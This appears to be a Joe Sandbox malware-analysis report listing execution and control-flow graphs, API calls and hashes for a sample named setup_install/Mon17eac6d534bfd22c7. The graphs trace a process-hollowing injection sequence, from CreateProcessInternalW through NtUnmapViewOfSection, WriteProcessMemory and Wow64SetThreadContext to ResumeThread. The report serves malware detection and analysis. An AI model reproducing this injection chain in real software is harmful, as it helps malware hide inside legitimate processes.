                                        • API String ID: 682475483-0
                                        APIs
                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D31E
                                        • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D345
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D34C
                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,0040D577,?,?,?,?,?,0040CBD8), ref: 0040D36C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1967947724.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_setup_install.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                        • String ID:
                                        • API String ID: 682475483-0
                                        • Opcode ID: 8e48d2cee91d44542ce9fc17ac4c11135f3bbeabf599bde86060f2d1956b30a9
                                        • Instruction ID: 7c0080117eb7fa6b1ed1918a70c481f90c959e41decf58ebd3a84544f6c216b6
                                        • Opcode Fuzzy Hash: 8e48d2cee91d44542ce9fc17ac4c11135f3bbeabf599bde86060f2d1956b30a9
                                        • Instruction Fuzzy Hash: 1CF0A4719046908BCB107FB9EDC451B7BA4AB50750F05017DDE885B356DB38AD08CBAB

                                        Execution Graph

                                        Execution Coverage: 21.6%
                                        Dynamic/Decrypted Code Coverage: 100%
                                        Signature Coverage: 12.4%
                                        Total number of Nodes: 105
                                        Total number of Limit Nodes: 2
                                        execution_graph 24319 551340e 24320 551341e 24319->24320 24323 5513458 24320->24323 24324 5513469 24323->24324 24328 5513a50 24324->24328 24362 5513a40 24324->24362 24325 551343e 24331 5513a90 24328->24331 24329 5514892 CreateProcessInternalW 24332 5514a33 24329->24332 24331->24329 24336 5513bd9 24331->24336 24357 5513a50 12 API calls 24331->24357 24358 5513a40 12 API calls 24331->24358 24396 55148a6 24331->24396 24333 5513d14 24333->24336 24400 5516218 24333->24400 24404 5516220 24333->24404 24334 5513e7f 24408 55162d0 24334->24408 24412 55162d8 24334->24412 24335 5513ebb 24335->24336 24416 55163b0 24335->24416 24420 55163aa 24335->24420 24336->24325 24337 551419e 24339 55141dd 24337->24339 24424 5516472 24337->24424 24428 5516478 24337->24428 24338 5513f91 24338->24329 24338->24336 24338->24337 24355 55163b0 WriteProcessMemory 24338->24355 24356 55163aa WriteProcessMemory 24338->24356 24339->24329 24339->24336 24340 551445c 24339->24340 24351 55163b0 WriteProcessMemory 24340->24351 24352 55163aa WriteProcessMemory 24340->24352 24341 5514485 24341->24336 24342 55145db 24341->24342 24347 5516472 Wow64SetThreadContext 24341->24347 24348 5516478 Wow64SetThreadContext 24341->24348 24342->24336 24432 5516538 24342->24432 24436 5516530 24342->24436 24347->24342 24348->24342 24351->24341 24352->24341 24355->24338 24356->24338 24357->24333 24358->24333 24366 5513a50 24362->24366 24363 5514892 CreateProcessInternalW 24365 5514a33 24363->24365 24366->24363 24375 5513bd9 24366->24375 24393 5513a50 12 API calls 24366->24393 24394 5513a40 12 API calls 24366->24394 24395 55148a6 CreateProcessInternalW 24366->24395 24367 5513d14 24367->24375 24389 5516220 NtUnmapViewOfSection 24367->24389 24390 5516218 NtUnmapViewOfSection 24367->24390 24368 5513e7f 24377 55162d0 NtAllocateVirtualMemory 24368->24377 24378 55162d8 NtAllocateVirtualMemory 24368->24378 24369 5513ebb 24369->24375 24381 55163b0 WriteProcessMemory 24369->24381 24382 55163aa 
WriteProcessMemory 24369->24382 24370 551419e 24372 55141dd 24370->24372 24385 5516472 Wow64SetThreadContext 24370->24385 24386 5516478 Wow64SetThreadContext 24370->24386 24371 5513f91 24371->24363 24371->24370 24371->24375 24391 55163b0 WriteProcessMemory 24371->24391 24392 55163aa WriteProcessMemory 24371->24392 24372->24363 24373 551445c 24372->24373 24372->24375 24387 55163b0 WriteProcessMemory 24373->24387 24388 55163aa WriteProcessMemory 24373->24388 24374 5514485 24374->24375 24376 55145db 24374->24376 24383 5516472 Wow64SetThreadContext 24374->24383 24384 5516478 Wow64SetThreadContext 24374->24384 24375->24325 24376->24375 24379 5516530 ResumeThread 24376->24379 24380 5516538 ResumeThread 24376->24380 24377->24369 24378->24369 24379->24375 24380->24375 24381->24371 24382->24371 24383->24376 24384->24376 24385->24372 24386->24372 24387->24374 24388->24374 24389->24368 24390->24368 24391->24371 24392->24371 24393->24367 24394->24367 24395->24367 24397 551492c CreateProcessInternalW 24396->24397 24399 5514a33 24397->24399 24401 551621b 24400->24401 24402 551626a NtUnmapViewOfSection 24400->24402 24401->24402 24403 5516294 24402->24403 24403->24334 24405 5516260 NtUnmapViewOfSection 24404->24405 24407 5516294 24405->24407 24407->24334 24409 55162d3 NtAllocateVirtualMemory 24408->24409 24411 551636a 24409->24411 24411->24335 24413 5516322 NtAllocateVirtualMemory 24412->24413 24415 551636a 24413->24415 24415->24335 24417 55163f0 WriteProcessMemory 24416->24417 24419 551642d 24417->24419 24419->24338 24421 55163b0 WriteProcessMemory 24420->24421 24423 551642d 24421->24423 24423->24338 24425 5516478 Wow64SetThreadContext 24424->24425 24427 55164ec 24425->24427 24427->24339 24429 55164b8 Wow64SetThreadContext 24428->24429 24431 55164ec 24429->24431 24431->24339 24433 5516578 ResumeThread 24432->24433 24435 55165a9 24433->24435 24435->24336 24437 5516538 ResumeThread 24436->24437 24439 55165a9 24437->24439 24439->24336 24440 2bf0910 24441 2bf0936 24440->24441 24445 
55a6c60 24441->24445 24449 55a6bf0 24441->24449 24442 2bf098d 24446 55a6c9e GetConsoleWindow 24445->24446 24448 55a6cce 24446->24448 24448->24442 24450 55a6c0a 24449->24450 24451 55a6c2a 24450->24451 24452 55a6ca8 GetConsoleWindow 24450->24452 24451->24442 24453 55a6cce 24452->24453 24453->24442

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 738 5513a50-5513b64 749 5513b72-5513b7a 738->749 750 5513b66-5513b70 738->750 751 5513b9b-5513bcc 749->751 750->749 752 5513b7c-5513b86 750->752 755 5513bd9-5513bdb 751->755 756 5513bce-5513bd7 751->756 753 5514897-5514938 752->753 754 5513b8c-5513b95 752->754 764 5514943-551494a 753->764 765 551493a-5514940 753->765 754->751 758 5514885-5514891 755->758 756->755 757 5513be0-5513be9 756->757 759 5513bf2-5513c11 757->759 760 5513beb-5513bed 757->760 759->753 763 5513c17-5513c8f 759->763 760->758 781 5513c91-5513c98 763->781 782 5513ca0-5513ca7 763->782 767 5514955-551496d 764->767 768 551494c-5514952 764->768 765->764 769 551496f-551497b 767->769 770 551497e-5514a31 CreateProcessInternalW 767->770 768->767 769->770 776 5514a33-5514a39 770->776 777 5514a3a-5514a8e 770->777 776->777 789 5514aa0-5514aa7 777->789 790 5514a90-5514a96 777->790 783 5514892 781->783 784 5513c9e 781->784 782->783 785 5513cad-5513d0f call 5515e6f 782->785 783->753 784->785 981 5513d12 call 5513a50 785->981 982 5513d12 call 5513a40 785->982 983 5513d12 call 55148a6 785->983 791 5514aa9-5514ab8 789->791 792 5514abe 789->792 790->789 791->792 795 5514abf 792->795 795->795 797 5513d14-5513d16 798 5513e06-5513e7a 797->798 799 5513d1c-5513d2f 797->799 977 5513e7d call 5516220 798->977 978 5513e7d call 5516218 798->978 800 5513d35-5513d79 799->800 801 5513dff-5513e01 799->801 800->801 808 5513d7f-5513dfa 800->808 801->758 808->801 814 5513e7f-5513eb6 984 5513eb9 call 55162d0 814->984 985 5513eb9 call 55162d8 814->985 820 5513ebb-5513ebd 821 5513ec3-5513ef3 820->821 822 5513f54-5513f8c 820->822 821->822 829 5513ef5-5513f4f 821->829 968 5513f8f call 55163b0 822->968 969 5513f8f call 55163aa 822->969 827 5513f91-5513f93 830 5513f99-5513fc9 827->830 831 551402a-551403a 827->831 829->758 830->831 848 5513fcb-5514025 830->848 832 5514040-55140f3 831->832 833 551419e-55141a4 831->833 870 55140f5-55140fc 832->870 871 5514104-551410b 832->871 834 
55141aa-55141d8 833->834 835 551428e-55142c3 833->835 972 55141db call 5516472 834->972 973 55141db call 5516478 834->973 854 55142c9-55142f9 835->854 855 551435a-55143a3 835->855 848->758 851 55141dd-55141df 851->855 856 55141e5-5514215 851->856 854->855 880 55142fb-5514355 854->880 872 55143a5-55143c1 855->872 856->855 882 551421b-5514289 856->882 870->783 874 5514102 870->874 871->783 875 5514111-5514141 871->875 872->753 886 55143c7-55143ce 872->886 874->875 878 5514143-551414a 875->878 879 5514152-5514159 875->879 878->783 884 5514150 878->884 879->783 885 551415f-5514178 879->885 880->758 882->758 884->885 979 551417b call 55163b0 885->979 980 551417b call 55163aa 885->980 887 55143d0-55143dc 886->887 888 55143de-55143e5 886->888 891 55143e7-551444d 887->891 888->872 888->891 903 551444f-5514456 891->903 904 551445e-5514465 891->904 893 551417d-5514198 893->832 893->833 903->783 905 551445c 903->905 904->783 906 551446b-5514480 904->906 905->906 974 5514483 call 55163b0 906->974 975 5514483 call 55163aa 906->975 909 5514485-5514487 912 5514565-551458e 909->912 913 551448d-55144d8 909->913 916 55146b4-55146fd 912->916 917 5514594-55145d6 912->917 913->912 925 55144de-5514560 913->925 928 5514703-5514747 916->928 929 55147d4-551480f 916->929 970 55145d9 call 5516472 917->970 971 55145d9 call 5516478 917->971 925->758 927 55145db-55145dd 927->929 930 55145e3-5514627 927->930 928->929 944 551474d-55147cf 928->944 966 5514812 call 5516530 929->966 967 5514812 call 5516538 929->967 930->929 945 551462d-55146af 930->945 941 5514814-5514880 941->758 944->758 945->758 966->941 967->941 968->827 969->827 970->927 971->927 972->851 973->851 974->909 975->909 977->814 978->814 979->893 980->893 981->797 982->797 983->797 984->820 985->820
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,0000000A,?,?,0000010B,?,?,?,?), ref: 05514A1E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 86be4c717f68af79c748b1561e91557ae708f12516b5867314b7dc487e96268e
                                        • Instruction ID: a62d10e6cd51e7f956f0d688f1cf9c534fdbacb59ec1295aca4d8db65edef554
                                        • Opcode Fuzzy Hash: 86be4c717f68af79c748b1561e91557ae708f12516b5867314b7dc487e96268e
                                        • Instruction Fuzzy Hash: EBA2D974E00219DFDB54DF65C990AADB7B3FF88310F1485A9D819AB294DB35AE82CF40

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 997 2bfb950-2bfb984 1000 2bfb986-2bfb98f 997->1000 1001 2bfb992-2bfb9a5 997->1001 1000->1001 1002 2bfb9ab-2bfb9ae 1001->1002 1003 2bfbc15-2bfbc19 1001->1003 1004 2bfb9bd-2bfb9c9 1002->1004 1005 2bfb9b0-2bfb9b5 1002->1005 1006 2bfbc2e-2bfbc38 1003->1006 1007 2bfbc1b-2bfbc2b 1003->1007 1009 2bfb9cf-2bfb9e1 1004->1009 1010 2bfbc53-2bfbc99 1004->1010 1005->1004 1007->1006 1014 2bfbb4d-2bfbb5b 1009->1014 1015 2bfb9e7-2bfba3a 1009->1015 1017 2bfbc9b-2bfbca5 1010->1017 1018 2bfbca8-2bfbcd0 1010->1018 1021 2bfbb61-2bfbb6f 1014->1021 1022 2bfbbe0-2bfbbe2 1014->1022 1045 2bfba3c-2bfba48 call 2bfb688 1015->1045 1046 2bfba4a 1015->1046 1017->1018 1041 2bfbcd6-2bfbcef 1018->1041 1042 2bfbe25-2bfbe43 1018->1042 1025 2bfbb7e-2bfbb8a 1021->1025 1026 2bfbb71-2bfbb76 1021->1026 1027 2bfbbe4-2bfbbea 1022->1027 1028 2bfbbf0-2bfbbf3 1022->1028 1025->1010 1032 2bfbb90-2bfbbbf 1025->1032 1026->1025 1030 2bfbbee 1027->1030 1031 2bfbbec 1027->1031 1150 2bfbbf6 call 2bfbe87 1028->1150 1151 2bfbbf6 call 2bfb950 1028->1151 1152 2bfbbf6 call 2bfb940 1028->1152 1153 2bfbbf6 call 2bfbc60 1028->1153 1030->1028 1031->1028 1049 2bfbbc1-2bfbbce 1032->1049 1050 2bfbbd0-2bfbbde 1032->1050 1035 2bfbbfc 1036 2bfbbfe-2bfbc0f 1035->1036 1036->1002 1036->1003 1056 2bfbe06-2bfbe1f 1041->1056 1057 2bfbcf5-2bfbd0b 1041->1057 1061 2bfbeae-2bfbeb8 1042->1061 1062 2bfbe45-2bfbe67 1042->1062 1052 2bfba4c-2bfba5c 1045->1052 1046->1052 1049->1050 1050->1003 1063 2bfba5e-2bfba75 1052->1063 1064 2bfba77-2bfba79 1052->1064 1056->1041 1056->1042 1057->1056 1079 2bfbd11-2bfbd5f 1057->1079 1082 2bfbeb9-2bfbf0a call 2bf76f8 1062->1082 1083 2bfbe69-2bfbe85 1062->1083 1063->1064 1065 2bfba7b-2bfba89 1064->1065 1066 2bfbac2-2bfbac4 1064->1066 1065->1066 1078 2bfba8b-2bfba9d 1065->1078 1071 2bfbac6-2bfbad0 1066->1071 1072 2bfbad2-2bfbad5 1066->1072 1071->1072 1084 2bfbb1b-2bfbb27 1071->1084 1155 2bfbad8 call 2bfc041 1072->1155 1156 2bfbad8 call 2bfc050 1072->1156 1077 
2bfbade-2bfbae2 1085 2bfbb0d-2bfbb13 call 2bfc2a9 1077->1085 1086 2bfbae4-2bfbaf2 1077->1086 1093 2bfba9f-2bfbaa1 1078->1093 1094 2bfbaa3-2bfbaa7 1078->1094 1127 2bfbd89-2bfbdad 1079->1127 1128 2bfbd61-2bfbd87 1079->1128 1116 2bfbf0c-2bfbf28 call 2bf6da0 1082->1116 1117 2bfbf2a-2bfbf59 call 2bf6438 * 3 1082->1117 1091 2bfbea9-2bfbeac 1083->1091 1084->1036 1097 2bfbb2d-2bfbb3d 1084->1097 1095 2bfbb19 1085->1095 1098 2bfbb05-2bfbb08 1086->1098 1099 2bfbaf4-2bfbb03 1086->1099 1091->1061 1100 2bfbe93-2bfbe96 1091->1100 1101 2bfbaad-2bfbabc 1093->1101 1094->1101 1095->1084 1114 2bfbb45-2bfbb48 1097->1114 1098->1003 1099->1084 1100->1082 1104 2bfbe98-2bfbea8 1100->1104 1101->1066 1112 2bfbc39-2bfbc4c 1101->1112 1104->1091 1112->1010 1114->1003 1116->1117 1137 2bfbf61-2bfbf68 1117->1137 1140 2bfbddf-2bfbdf8 1127->1140 1141 2bfbdaf-2bfbdc6 1127->1141 1128->1127 1144 2bfbdfa 1140->1144 1145 2bfbe03 1140->1145 1147 2bfbdc8-2bfbdcb 1141->1147 1148 2bfbdd2-2bfbddd 1141->1148 1144->1145 1145->1056 1147->1148 1148->1140 1148->1141 1150->1035 1151->1035 1152->1035 1153->1035 1155->1077 1156->1077
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 63527874338152511fcc20e10c389431aeda0b58f618744f6269f9eb7212b63b
                                        • Instruction ID: 86c73e465fa8188cfef3dc67e60baa8ce76cc9c47f564bd996b347a2ae6d7984
                                        • Opcode Fuzzy Hash: 63527874338152511fcc20e10c389431aeda0b58f618744f6269f9eb7212b63b
                                        • Instruction Fuzzy Hash: 21124934B002058FCB54DF69C594AAEBBF6FF88704B1485A9E906EB365DB31DC46CB90

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1600 55162d0-55162d1 1601 55162d3-551631c 1600->1601 1602 5516322-5516368 NtAllocateVirtualMemory 1600->1602 1601->1602 1605 5516371-5516396 1602->1605 1606 551636a-5516370 1602->1606 1606->1605
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0551635B
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: 13885875ef88e01875f4dc7d5ae2a4a203c8fb292586bfba8ae3ca8f48a13497
                                        • Instruction ID: cf8d62563067a2b54365ffa61608981f6a012002e73ff01cb7c8a0a8e6534a1c
                                        • Opcode Fuzzy Hash: 13885875ef88e01875f4dc7d5ae2a4a203c8fb292586bfba8ae3ca8f48a13497
                                        • Instruction Fuzzy Hash: 2B2116B2D002099FCB10DFAAC885ADEFFF5FF48310F10842AE919A3210D775A944CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1610 55162d8-5516368 NtAllocateVirtualMemory 1613 5516371-5516396 1610->1613 1614 551636a-5516370 1610->1614 1614->1613
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0551635B
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: f21497ab24b00f2b4235dbd4b679e29ded3af249141bc75554165b24824785f7
                                        • Instruction ID: f7b37b38f95596c230c84aa2fd5f21a606d6682fe137ab758ed72298deb4ed99
                                        • Opcode Fuzzy Hash: f21497ab24b00f2b4235dbd4b679e29ded3af249141bc75554165b24824785f7
                                        • Instruction Fuzzy Hash: CF2104B1D002599FCB10DFAAC885ADEFFF5FF48310F10842AE919A7210CB75A954CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1644 5516218-5516219 1645 551621b-5516263 1644->1645 1646 551626a-5516292 NtUnmapViewOfSection 1644->1646 1645->1646 1647 5516294-551629a 1646->1647 1648 551629b-55162c0 1646->1648 1647->1648
                                        APIs
                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 05516285
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: SectionUnmapView
                                        • String ID:
                                        • API String ID: 498011366-0
                                        • Opcode ID: 51edc7ed534ecd55e1e94f4d8b3d22fbf5bf032d4c20b017a82ba6f56a8bcbbb
                                        • Instruction ID: 7d2c4932b65e62d180801f159564954fc56d25015ec2ba013c4b81bb3b7ba50f
                                        • Opcode Fuzzy Hash: 51edc7ed534ecd55e1e94f4d8b3d22fbf5bf032d4c20b017a82ba6f56a8bcbbb
                                        • Instruction Fuzzy Hash: 2E1149B1D002488FDB14DFAAC845BEEFFF5FB88324F148429D459A7650CB75A544CB94
                                        APIs
                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 05516285
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: SectionUnmapView
                                        • String ID:
                                        • API String ID: 498011366-0
                                        • Opcode ID: 6f17c870aa67a4557bf4daaf4fb43ddc53c573c2c0c8143c47a1d404cfa5e8b6
                                        • Instruction ID: 30338f190f92e13125a7478813a4b84627b155852c8f2870a8415075cd15db3b
                                        • Opcode Fuzzy Hash: 6f17c870aa67a4557bf4daaf4fb43ddc53c573c2c0c8143c47a1d404cfa5e8b6
                                        • Instruction Fuzzy Hash: 2B1128B1D002488FDB14DFAAC845BDEFFF5FB88324F208429D559A7250CB75A544CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 2bf78a8-2bf78bb 1 2bf78be-2bf78e2 0->1 3 2bf7a28-2bfaf4f 1->3 4 2bf78e8-2bf78fb 1->4 729 2bfaf99-2bfafa0 3->729 5 2bf7901-2bf7904 4->5 6 2bf7a10-2bf7a1a 4->6 7 2bf7907-2bf7921 5->7 6->1 8 2bf7a20-2bf7a27 6->8 7->6 12 2bf7927-2bf7929 7->12 13 2bf792b-2bf7941 12->13 14 2bf7943-2bf7950 12->14 19 2bf7953-2bf79a7 call 2bf6c20 13->19 14->19 31 2bf79a9-2bf79ad 19->31 32 2bf79b8 19->32 35 2bf79b6 31->35 34 2bf79ba-2bf79c8 32->34 38 2bf79ca-2bf79f5 call 2bf71d8 34->38 39 2bf79f7 34->39 35->34 41 2bf79fa-2bf7a0a 38->41 39->41 41->6 41->7 730 2bfafa2-2bfafa7 729->730 731 2bfaf51-2bfaf68 729->731 732 2bfaf6a-2bfaf96 731->732 733 2bfafa8-2bfafda 731->733 732->729
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $#^q$(Acq$(o^q$, ^q$,bq$,bq$0"^q$4'^q$4c^q$Hb_q$LR^q$PH^q$Pp^q$X#^q$\;^q$\s^q$p ^q$p<^q$pBcq$p`^q$x cq$xbq$|b_q$|cq$cq$$^q$;^q$c^q
                                        • API String ID: 0-60724802
                                        • Opcode ID: 1726664a32ebb671ed27f048083463ff6cabd7f322a1d08f47b3e2295c4f92cb
                                        • Instruction ID: dca776ff0c23eff6257dee2d784c9e6fa1d24a424ef63d6cbc75f498ecce35c2
                                        • Opcode Fuzzy Hash: 1726664a32ebb671ed27f048083463ff6cabd7f322a1d08f47b3e2295c4f92cb
                                        • Instruction Fuzzy Hash: E8635E30B80218AFDB159BA4DD04B9E7BB6FB89700F1044D9E6096B3E8CB765E85CF15

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 986 2bf0d91-2bf0d9d 987 2bf0d9f-2bf0db5 986->987 988 2bf0d58-2bf0d8f 986->988 995 2bf0db7 call 2bf1f18 987->995 996 2bf0db7 call 2bf1f07 987->996 993 2bf0dbd-2bf0dbe 995->993 996->993
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q
                                        • API String ID: 0-2697143702
                                        • Opcode ID: 5a1d4ce8da238db8f7d3780fff480543107b50be6fce45ceda2e2d7374d08718
                                        • Instruction ID: 5c3b78754316b2bab722ac5c48d7aed0441fee123acecef9c03357e3ea7c257c
                                        • Opcode Fuzzy Hash: 5a1d4ce8da238db8f7d3780fff480543107b50be6fce45ceda2e2d7374d08718
                                        • Instruction Fuzzy Hash: 57F06230A456959FCB4AEB65D5641DDBBF1DF46200B0009DAC0898B1A5DF311E4ADB41

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1438 55148a6-5514938 1440 5514943-551494a 1438->1440 1441 551493a-5514940 1438->1441 1442 5514955-551496d 1440->1442 1443 551494c-5514952 1440->1443 1441->1440 1444 551496f-551497b 1442->1444 1445 551497e-5514a31 CreateProcessInternalW 1442->1445 1443->1442 1444->1445 1448 5514a33-5514a39 1445->1448 1449 5514a3a-5514a8e 1445->1449 1448->1449 1454 5514aa0-5514aa7 1449->1454 1455 5514a90-5514a96 1449->1455 1456 5514aa9-5514ab8 1454->1456 1457 5514abe 1454->1457 1455->1454 1456->1457 1459 5514abf 1457->1459 1459->1459
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,0000000A,?,?,0000010B,?,?,?,?), ref: 05514A1E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: d7814fe65b41b5f57509897659a38e2335983c29558c528b646ac9072d5f8ed0
                                        • Instruction ID: cc697d73c054919a62fe32c7e948aa63c968e6a7040c1714ab9efb3921155edf
                                        • Opcode Fuzzy Hash: d7814fe65b41b5f57509897659a38e2335983c29558c528b646ac9072d5f8ed0
                                        • Instruction Fuzzy Hash: BC51F571D00229DFEF24CF99C940BDDBBB2BB48310F1584AAE909B7250DB359A85CF94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1460 55a6bf0-55a6c08 1461 55a6c0a-55a6c13 1460->1461 1462 55a6c43-55a6ccc GetConsoleWindow 1460->1462 1463 55a6c21-55a6c28 1461->1463 1464 55a6c15-55a6c17 1461->1464 1472 55a6cce-55a6cd4 1462->1472 1473 55a6cd5-55a6cfa 1462->1473 1463->1462 1466 55a6c2a-55a6c42 1463->1466 1464->1463 1472->1473
                                        APIs
                                        • GetConsoleWindow.KERNELBASE ref: 055A6CBF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1829738306.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_55a0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ConsoleWindow
                                        • String ID:
                                        • API String ID: 2863861424-0
                                        • Opcode ID: a5fa2443d361b60643fa4a9715a32692ff6bee5fb8bdde285856c21b1c806b0f
                                        • Instruction ID: 52f06ac3f2c7ffff4d4a9ab2c6b7a765bb9e2145af0e22f4c4574de4acd325ac
                                        • Opcode Fuzzy Hash: a5fa2443d361b60643fa4a9715a32692ff6bee5fb8bdde285856c21b1c806b0f
                                        • Instruction Fuzzy Hash: C531DD72E042598FCB24DFA9C41879FFBF1FB84320F14882AC419AB240CB34A884CBD0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1618 55163aa-551642b WriteProcessMemory 1622 5516434-5516464 1618->1622 1623 551642d-5516433 1618->1623 1623->1622
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0551641E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 200d4f525427b474cf252695e7f6b8eae8c0333d0fba01c0e54626616bcb0247
                                        • Instruction ID: e7fee39853aa08507226b4066a2de2db8f9753dc7277cb462f0a00f67f8fad93
                                        • Opcode Fuzzy Hash: 200d4f525427b474cf252695e7f6b8eae8c0333d0fba01c0e54626616bcb0247
                                        • Instruction Fuzzy Hash: 46218C728002098FDB10CF99C845BEEBFF1FF88324F148829E559A7250CB759544CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1627 55163b0-551642b WriteProcessMemory 1630 5516434-5516464 1627->1630 1631 551642d-5516433 1627->1631 1631->1630
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0551641E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 6d138e79518023f725dd7eaaabb3c7af4eba5ebcd06517ccf854853e14742472
                                        • Instruction ID: c029afc06c9a9344836d078659d5cccb5a41ffbe2cbd67401b134b34eb4e3731
                                        • Opcode Fuzzy Hash: 6d138e79518023f725dd7eaaabb3c7af4eba5ebcd06517ccf854853e14742472
                                        • Instruction Fuzzy Hash: 351159728002498FDB10CFA9C845BEEBFF5EF88324F108429E559A7250CB799544DBA5

                                        Control-flow graph (figure; the original colours executed and not-executed blocks): basic block 5516472-55164ea calls Wow64SetThreadContext and branches to 55164ec-55164f2 or 55164f3-5516523; 55164ec-55164f2 falls through to 55164f3-5516523.
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 055164DD
                                        Memory Dump Source
